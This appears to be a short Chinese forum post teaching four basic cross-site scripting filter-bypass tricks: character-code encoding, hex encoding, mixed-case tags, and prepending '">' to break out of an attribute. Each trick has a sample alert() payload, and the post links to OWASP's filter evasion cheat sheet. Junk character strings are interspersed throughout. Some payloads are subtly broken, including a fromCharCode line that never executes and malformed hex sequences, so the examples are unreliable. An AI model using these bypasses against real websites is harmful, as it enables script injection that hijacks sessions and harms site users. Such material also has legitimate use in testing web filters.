四种超级基础的绕过方法。! L7 O0 \0 I) r3 H( ?" ]3 z
1.转换为ASCII码
7 z; {/ S3 H: M$ M$ ?7 L9 J$ W例子:原脚本为<script>alert(‘I love F4ck’)</script > {4 @0 X: ]( H- `* U) h g
通过转换,变成:0 q1 P+ O9 d+ r7 `1 Y* E2 B
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>
/ E7 U0 G9 \3 I" y, K
4 j+ h ~- R% b9 C2.转换为HEX(十六进制)8 ? y' _$ h% b3 K9 K% c- g
例子:原脚本为<script>alert(‘I love F4ck’)</script>
$ _" X5 o9 j4 f; b1 b4 t通过转换,变成:
9 k; G$ u8 l5 a3 S6 B' w+ T%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e3 N1 a: F r5 M+ _+ w, N) j) o
( K( ]# }7 H8 T, N
3.转换脚本的大小写
_( s7 x* J8 W3 L+ Y' g; e例子:原脚本为<script>alert(‘I love F4ck’)</script>, D- n& h5 e% l( _9 ]
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
6 N( q4 v( n3 S5 p+ L! _2 s % e8 f5 L1 o5 _
4.增加闭合标记”>
( J; q9 T0 n8 C6 C例子:原脚本为<script>alert(‘I love F4ck’)</script>
0 X: g4 v$ {% }* J转换为:”><script>alert(‘I love F4ck’)</script>
: G, y+ M$ q0 F- Z( H& g1 B更详细绕过技术请参考此网页
4 W% {: f% H( Z$ r( n. g! w* Lhttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet+ a, w% ?# E$ Z" ]2 D: y. R( i
; b, \6 s8 x' k* M, X$ d; f" h
转换工具使用的是火狐的 hackbar mozilla addon. |